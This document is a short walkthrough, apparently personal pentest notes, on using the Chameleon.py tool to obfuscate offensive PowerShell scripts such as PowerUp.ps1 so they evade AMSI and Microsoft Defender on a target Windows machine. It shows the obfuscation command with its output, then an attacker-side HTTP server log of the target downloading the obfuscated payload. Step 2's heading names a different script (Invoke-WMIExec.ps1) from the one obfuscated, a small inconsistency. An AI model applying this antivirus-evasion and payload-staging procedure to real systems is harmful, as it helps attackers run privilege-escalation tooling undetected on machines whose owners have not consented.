=========================================================================================================================================================
Simple AV bypass using the PowerShell obfuscation script 'Chameleon.py'
=========================================================================================================================================================

Chameleon is yet another PowerShell obfuscation tool designed to bypass AMSI and commercial antivirus solutions.

=> Source: https://github.com/klezVirus/chameleon

The objective is to use 'chameleon.py' to obfuscate offensive powershell scripts so we can copy them on the disk of a target Windows laptop or Windows server   
and then run them without being detected and deleted by the Microsoft Defender AV (or other AV products).

The tool has been developed as a Python port of the Chimera project.. As such, it uses mostly the same techniques to evade common detection signatures, such as:
> comment deletion/substitution
> string substitution (variables, functions, data-types)
> variable concatenation
> indentation randomization
> semi-random backticks insertion
> case randomization
> encoding


=========================================================================================================================================================
PoC - Example with the script 'PowerUp.ps1' running on a Windows 10 laptop (fully patched with Defender AV enabled and up-to-date)
=========================================================================================================================================================


Step 1 - Obfuscate the script  'PowerUp.ps1' with Chameleon.py on a Kali VM
----------------------------------------------------------------------------------

jeff@kali:~/Documents/Tools/chameleon-main$ python3 ./chameleon.py -K jeff -l 5 -a ./powerup.ps1 -o ./chameleon-p0w3rup1.ps1 --decimal
sh: 1: color: not found
__________________________________________________________________________________
                                                                                                                                                                                                                                           
  ▒▒▒▒▒▒  ▒▒   ▒▒  ▒▒▒▒▒  ▒▒▒    ▒▒▒ ▒▒▒▒▒▒▒ ▒▒     ▒▒▒▒▒▒▒  ▒▒▒▒▒  ▒▒▒  ▒▒  ▒▒▒                                                                                                                                                           
  ▒▒      ▒▒   ▒▒ ▒▒   ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒     ▒▒      ▒▒   ▒▒ ▒▒▒▒ ▒▒ ▒▒▒▒                                                                                                                                                           
  ▓▓      ▓▓▓▓▓▓▓ ▓▓▓▓▓▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓     ▓▓▓▓▓   ▓▓   ▓▓ ▓▓ ▓▓▓▓   ▓▓                                                                                                                                                           
  ██      ██   ██ ██   ██ ██  ██  ██ ██      ██     ██      ██   ██ ██  ███   ██                                                                                                                                                           
  ██████  ██   ██ ██   ██ ██      ██ ███████ ██████ ███████  █████  ██   ██   ██                                                                                                                                                           
----------------------------------------------------------------------------------                                                                                                                                                         
▒ by d3adc0de (@klezVirus)                                                                                                                                                                                                                 
__________________________________________________________________________________                                                                                                                                                         
                                                                                                                                                                                                                                           
[+] Starting obfuscation at 2022-12-13 00:10:47.751341                                                                                                                                                                                     
  [*] Zeroing out comments... Done                                                                                                                                                                                                         
[+] Chameleon: standard obfuscation                                                                                                                                                                                                        
  [*] Identifying scoped variables and reflective constructors                                                                                                                                                                             
    [>] Generating function mapping... Success                                                                                                                                                                                             
    [>] Identified 67 scoped variables which will not be obfuscated                                                                                                                                                                        
  [*] Variables Obfuscation... Done                                                                                                                                                                                                        
  [*] Data Types Obfuscation... Done                                                                                                                                                                                                       
  [*] Function Obfuscation... Done                                                                                                                                                                                                         
  [*] Nishang Obfuscation... Done                                                                                                                                                                                                          
  [*] Cases randomization... Done                                                                                                                                                                                                          
  [*] IP Address to Hex... Done                                                                                                                                                                                                            
  [*] Comments Obfuscation... Done                                                                                                                                                                                                         
  [*] Indentation Randomization... Done                                                                                                                                                                                                    
  [*] Strings Obfuscation... Done                                                                                                                                                                                                          
[+] Chameleon: obfuscation via encoding                                                                                                                                                                                                    
  [*] Converting to decimal... Done                                                                                                                                                                                                        
  [*] Writing obfuscated payload to ./chameleon-p0w3rup1.ps1... Done                                                                                                                                                                       
[+] Ended obfuscation at 2022-12-13 00:10:55.818079      


Step 2 - Check that the obfuscated 'Invoke-WMIExec.ps1' is working properly without being detected by the AMSI / Defender AV
-----------------------------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/Tools/chameleon-main$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.1.113 - - [13/Dec/2022 01:11:14] "GET / HTTP/1.1" 200 -
192.168.1.113 - - [13/Dec/2022 01:11:16] "GET / HTTP/1.1" 200 -
192.168.1.113 - - [13/Dec/2022 01:11:19] "GET /chameleon-p0w3rup1.ps1 HTTP/1.1" 200 -

